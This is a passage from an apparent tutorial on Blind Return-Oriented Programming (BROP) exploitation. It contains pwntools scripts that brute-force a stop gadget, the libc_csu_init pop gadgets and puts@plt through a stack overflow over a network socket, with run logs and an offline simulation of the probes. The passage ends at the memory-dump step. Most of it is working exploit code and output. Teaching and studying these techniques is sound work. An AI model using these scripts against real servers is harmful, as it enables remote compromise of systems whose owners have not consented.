...

Code Block
languagepy
titlefind_stop_gadget
from pwn import *

# ip and port are placeholders for the target; the page's run reports the
# overflow size (72) found earlier in the script and passes it in as `size`.
ip = '127.0.0.1'
port = 9999
base = 0x400000    # load address of the non-PIE binary; .text starts shortly above it

def find_stop_gadget(size):
    p = log.progress("Searching for Stop gadget ")

    # Brute-force return addresses just above the image base. A "stop gadget"
    # is any address that neither crashes nor hangs the forked child; here it
    # is recognised by the banner being printed again.
    for offset in range(1, 0x1000):
        addr = base + offset

        payload = b'A' * size
        payload += p64(addr)

        if offset % 0x100 == 0:
            log.info(" Progressed to  0x%x" % offset)

        r = None
        try:
            r = remote(ip, port, level='error')
            r.recvuntil(b'WelCome my friend,Do you know password?\n')
            r.send(payload)
            response = r.recv(timeout=0.2)
            r.close()

            if b'WelCome my friend,Do you know password?' in response:
                p.success("Done")
                log.info("Stop address: " + hex(addr))
                return addr
        except Exception as e:
            # EOF / connection reset: the child crashed, so this is not a stop gadget.
            if r is not None:
                r.close()

    p.failure("Not found")
    return None
  • Running the script above finds the Stop Gadget as shown below.
Code Block
titlepython ./find_stop_gadget.py
lazenca0x0@ubuntu:~/Exploit/BROP$ python ./find_stop_gadget.py 
[*] Overflow size : 72
[+] Searching for Stop gadget : Done
[*]  Progressed to  0x100
[*]  Progressed to  0x200
[*]  Progressed to  0x300
[*]  Progressed to  0x400
[*]  Progressed to  0x500
[*] Stop address: 0x4005c0

...

Code Block
languagepy
titledef maybe_BROP_gadget(size, stop_gadget, addr):
def maybe_BROP_gadget(size, stop_gadget, addr):
    # Candidate test: addr, six dummy qwords, then the stop gadget. Only a
    # gadget that pops exactly six qwords and returns lands on the stop gadget
    # (banner printed again). The stop gadget itself also passes this test,
    # so a candidate still has to pass is_BROP_gadget().
    r = None
    try:
        payload = b'A' * size
        payload += p64(addr)
        payload += p64(0) * 6
        payload += p64(stop_gadget)

        r = remote(ip, port, level='error')
        r.recvuntil(b'WelCome my friend,Do you know password?\n')
        r.sendline(payload)
        response = r.recv(timeout=0.2)
        r.close()

        return b'WelCome my friend,Do you know password?' in response

    except Exception as e:
        # EOF / connection reset: the child crashed, so this is not a candidate.
        if r is not None:
            r.close()
        return False
  • Next, the Stop Gadget is dropped and only the address presumed to be the BROP Gadget is sent, followed by junk, as shown below.
    • If an exception occurs (the connection is closed), the address is judged to be the BROP Gadget: a real pop-six gadget pops the 0x41 qwords and then returns to 0x4141414141414141, which crashes the child, whereas the Stop Gadget (which also passed the previous test) keeps running and is therefore rejected here.
Code Block
languagepy
titledef is_BROP_gadget(size,addr):
def is_BROP_gadget(size, addr):
    # Crash test: the candidate followed by junk only. A real pop-six gadget
    # returns into 0x4141414141414141 and the child dies (EOF raises); the stop
    # gadget just prints the banner again and is rejected.
    r = None
    try:
        payload = b'A' * size
        payload += p64(addr)
        payload += p64(0x41) * 10

        r = remote(ip, port, level='error')
        r.recvuntil(b'WelCome my friend,Do you know password?\n')
        r.sendline(payload)
        response = r.recv(timeout=0.2)   # a silent hang is not a crash; only EOF counts
        r.close()
        return False

    except Exception as e:
        if r is not None:
            r.close()
        return True
  • The BROP Gadget can then be found with the following code.
Code Block
languagepy
titledef find_brop_gadget(size,stop_gadget):
def find_brop_gadget(size, stop_gadget):
    p = log.progress("Searching for BROP gadget ")

    # Two-stage scan: a cheap candidate test (six pops land on the stop
    # gadget), then a crash test to drop the stop gadget and anything else
    # that merely re-enters the program.
    for offset in range(0x1, 0x1000):
        if offset % 0x100 == 0:
            log.info('Progressed to 0x%x' % offset)

        addr = base + offset

        if maybe_BROP_gadget(size, stop_gadget, addr):
            log.info('Maybe BROP Gadget : ' + hex(addr))
            if is_BROP_gadget(size, addr):
                p.success("Done")
                log.info('Found BROP Gadget : ' + hex(addr))
                return addr

    p.failure("Not found")
    return None

...

Code Block
titleFind BROP Gadget
lazenca0x0@ubuntu:~/Exploit/BROP$ python maybe_BROP_gadget.py 
[*] Overflow size : 72
[+] Searching for Stop gadget : Done
[*]  Progressed to 0x100
[*]  Progressed to 0x200
[*]  Progressed to 0x300
[*]  Progressed to 0x400
[*]  Progressed to 0x500
[*] Stop address: 0x4005c0
[+] Searching for BROP gadget : Done
[*] Progressed to 0x100
[*] Progressed to 0x200
[*] Progressed to 0x300
[*] Progressed to 0x400
[*] Progressed to 0x500
[*] Maybe BROP Gadget : 0x4005c0
[*] Maybe BROP Gadget : 0x4005c2
[*] Maybe BROP Gadget : 0x4005c3
[*] Maybe BROP Gadget : 0x4005c5
[*] Maybe BROP Gadget : 0x4005c6
[*] Maybe BROP Gadget : 0x4005c7
[*] Maybe BROP Gadget : 0x4005c9
[*] Maybe BROP Gadget : 0x4005cd
[*] Maybe BROP Gadget : 0x4005ce
[*] Maybe BROP Gadget : 0x4005cf
[*] Maybe BROP Gadget : 0x4005d0
[*] Maybe BROP Gadget : 0x4005d6
[*] Maybe BROP Gadget : 0x4005d7
[*] Maybe BROP Gadget : 0x4005dd
[*] Maybe BROP Gadget : 0x4005de
[*] Progressed to 0x600
[*] Maybe BROP Gadget : 0x4006b6
[*] Maybe BROP Gadget : 0x4006b7
[*] Maybe BROP Gadget : 0x4006b8
[*] Maybe BROP Gadget : 0x4006ba
[*] Maybe BROP Gadget : 0x4006ce
[*] Maybe BROP Gadget : 0x4006e2
[*] Maybe BROP Gadget : 0x4006f6
[*] Progressed to 0x700
[*] Maybe BROP Gadget : 0x4007ba
[*] Found BROP Gadget : 0x4007ba
[+] BROP Gadget : 0x4007ba
[+] RDI Gadget : 0x4007c3
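The search above can be exercised without a live target. The following is an added example, not the page's exploit code: it models a tiny non-PIE binary as a table of "how many qwords this address pops before its ret", runs the same three probes against that model (stop gadget scan, the six-dummy-qword candidate test, the junk crash test), and then goes one step beyond the page by counting the pops of the misaligned entries into the same bytes, which is what makes 0x4007ba + 9 the pop rdi gadget (0x4007c3) and 0x4007ba + 7 the pop rsi gadget. The banner, offsets and addresses are constructed to mirror the run above; the gadget table, the `simulate()` target and the `Crash` exception are assumptions that stand in for the real forked server and its socket closing on a crash.

```python
import struct

# Constructed model of the target (an assumption, not the real binary).
BANNER = b'WelCome my friend,Do you know password?\n'
OVERFLOW = 72        # bytes before the saved return address (the page's "Overflow size : 72")
BASE = 0x400000
STOP = 0x4005c0      # models the stop gadget: re-enters main and prints the banner again
BROP = 0x4007ba      # models the tail of __libc_csu_init: 5b 5d 41 5c 41 5d 41 5e 41 5f c3

# address -> qwords popped before the 'ret'. Anything not listed crashes.
GADGETS = {
    BROP + 0: 6,     # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
    BROP + 1: 5,
    BROP + 2: 4,
    BROP + 4: 3,
    BROP + 5: 3,     # misaligned: pop rbp; pop r14; pop r15; ret
    BROP + 6: 2,
    BROP + 7: 2,     # misaligned: pop rsi; pop r15; ret
    BROP + 8: 1,
    BROP + 9: 1,     # misaligned: pop rdi; ret  (0x4007c3 in the run above)
    BROP + 10: 0,    # bare ret
}

def p64(v):
    return struct.pack('<Q', v)

def u64(b):
    return struct.unpack('<Q', b)[0]

class Crash(Exception):
    """The forked child died; the real server just closes the socket (EOF)."""

def simulate(payload, max_steps=16):
    """One connection against the model: return what the target writes after
    the banner, or raise Crash. Returning into stack data we did not supply
    is modelled as a crash."""
    stack = payload[OVERFLOW:]
    for _ in range(max_steps):
        if len(stack) < 8:
            raise Crash
        rip, stack = u64(stack[:8]), stack[8:]
        if rip == STOP:
            return BANNER
        if rip not in GADGETS:
            raise Crash
        stack = stack[8 * GADGETS[rip]:]   # the gadget's pops, then its ret
    raise Crash

def probe(payload):
    """Send one payload; None means the connection died (crash)."""
    try:
        return simulate(payload)
    except Crash:
        return None

def banner_again(resp):
    return resp is not None and BANNER in resp

def find_stop_gadget():
    for off in range(1, 0x1000):
        addr = BASE + off
        if banner_again(probe(b'A' * OVERFLOW + p64(addr))):
            return addr
    return None

def maybe_brop_gadget(addr, stop):
    # addr, six dummy qwords, stop: only a pop-six gadget (or something that
    # never returns, like the stop gadget itself) brings the banner back.
    return banner_again(probe(b'A' * OVERFLOW + p64(addr) + p64(0) * 6 + p64(stop)))

def is_brop_gadget(addr):
    # Same candidate with junk only: a real pop-six gadget returns into
    # 0x4141414141414141 and dies; the stop gadget survives and is rejected.
    return probe(b'A' * OVERFLOW + p64(addr) + p64(0x41) * 10) is None

def find_brop_gadget(stop):
    candidates = []
    for off in range(1, 0x1000):
        addr = BASE + off
        if maybe_brop_gadget(addr, stop):
            candidates.append(addr)
            if is_brop_gadget(addr):
                return addr, candidates
    return None, candidates

def count_pops(addr, stop, limit=8):
    """Generalisation of the candidate test: the smallest k for which
    addr + k dummy qwords + stop brings the banner back, i.e. how many
    qwords the gadget pops. None if no k < limit works."""
    for k in range(limit):
        if banner_again(probe(b'A' * OVERFLOW + p64(addr) + p64(0) * k + p64(stop))):
            return k
    return None

def derive_gadgets(brop):
    # Entering the csu tail mid-instruction: +7 -> pop rsi; pop r15; ret,
    # +9 -> pop rdi; ret. This turns 0x4007ba into the RDI gadget 0x4007c3.
    return {'rsi': brop + 7, 'rdi': brop + 9}

if __name__ == '__main__':
    stop = find_stop_gadget()
    brop, cands = find_brop_gadget(stop)
    g = derive_gadgets(brop)
    print('stop gadget : %#x' % stop)
    print('candidates  : ' + ', '.join('%#x' % c for c in cands))
    print('BROP gadget : %#x' % brop)
    print('pop rdi;ret : %#x (pops %d)' % (g['rdi'], count_pops(g['rdi'], stop)))
    print('pop rsi;pop r15;ret : %#x (pops %d)' % (g['rsi'], count_pops(g['rsi'], stop)))
```

In the model, as in the run above, the stop gadget itself is the first address to pass the candidate test and the first to be thrown out by the crash test; only the pop-six entry survives both. Against a real target the same probes cost one connection each, so `count_pops()` is worth running only on the handful of addresses derived from the BROP gadget, not across the whole range.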

Get puts@plt address

...

Code Block
titleFind puts@plt
lazenca0x0@ubuntu:~/Exploit/BROP$ python find_puts_addr.py 
[*] Overflow size : 72
[+] Searching for Stop gadget : Done
[*]  Progressed to 0x100
[*]  Progressed to 0x200
[*]  Progressed to 0x300
[*]  Progressed to 0x400
[*]  Progressed to 0x500
[*] Stop address: 0x4005c0
[+] Searching for BROP gadget : Done
[*] Progressed to 0x100
[*] Progressed to 0x200
[*] Progressed to 0x300
[*] Progressed to 0x400
[*] Progressed to 0x500
[*] Maybe BROP Gadget : 0x4005c0
[*] Maybe BROP Gadget : 0x4005c2
[*] Maybe BROP Gadget : 0x4005c3
[*] Maybe BROP Gadget : 0x4005c5
[*] Maybe BROP Gadget : 0x4005c6
[*] Maybe BROP Gadget : 0x4005c7
[*] Maybe BROP Gadget : 0x4005c9
[*] Maybe BROP Gadget : 0x4005cd
[*] Maybe BROP Gadget : 0x4005ce
[*] Maybe BROP Gadget : 0x4005cf
[*] Maybe BROP Gadget : 0x4005d0
[*] Maybe BROP Gadget : 0x4005d6
[*] Maybe BROP Gadget : 0x4005d7
[*] Maybe BROP Gadget : 0x4005dd
[*] Maybe BROP Gadget : 0x4005de
[*] Progressed to 0x600
[*] Maybe BROP Gadget : 0x4006b6
[*] Maybe BROP Gadget : 0x4006b7
[*] Maybe BROP Gadget : 0x4006b8
[*] Maybe BROP Gadget : 0x4006ba
[*] Maybe BROP Gadget : 0x4006ce
[*] Maybe BROP Gadget : 0x4006e2
[*] Maybe BROP Gadget : 0x4006f6
[*] Progressed to 0x700
[*] Maybe BROP Gadget : 0x4007ba
[*] Found BROP Gadget : 0x4007ba
[+] BROP Gadget : 0x4007ba
[+] RDI Gadget : 0x4007c3
[▖] Searching for the address of puts@plt
[*] currently at 0x100
[*] currently at 0x200
[*] currently at 0x300
[*] currently at 0x400
[*] currently at 0x500
find puts@plt addr: 0x400555
[+] Puts plt : 0x400555

Dump memory

...